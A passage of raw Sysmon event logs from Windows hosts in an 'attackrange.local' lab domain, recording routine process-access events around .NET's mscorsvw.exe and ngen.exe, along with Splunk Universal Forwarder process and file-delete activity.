Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050623Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.410{85C0FFC9-EC2F-607E-F106-00000000BB01}1492C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050622Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:55.377{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F898A86CE15FFA52B0F4D0A6BF260A9,SHA256=924457CCB07242DD7A1DBBC0D3CAE886F4E19566F73212DB0054024EF0C8B4FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.981{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-540F-00000000BB01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.981{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-540F-00000000BB01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.981{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-540F-00000000BB01}4800C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.950{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-530F-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.934{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-530F-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.934{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-530F-00000000BB01}1528C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.903{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-520F-00000000BB01}6348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.888{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-520F-00000000BB01}6348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.888{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-520F-00000000BB01}6348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.856{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-510F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.856{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-510F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.856{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-510F-00000000BB01}5848C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.809{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-500F-00000000BB01}6840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.794{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-500F-00000000BB01}6840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.794{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-500F-00000000BB01}6840C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.763{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-4F0F-00000000BB01}6832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.763{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-4F0F-00000000BB01}6832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.763{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-4F0F-00000000BB01}6832C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.763{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3FAC4FF3A9A6F6FD526AF23D0186C8B,SHA256=FE0475759414157E2BF3242C512C9F06BE3BE24122AF8517D10FDB1EEC76F994,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.684{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC30-607E-4E0F-00000000BB01}6136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.669{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC30-607E-4E0F-00000000BB01}6136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:56.669{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC30-607E-4E0F-00000000BB01}6136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 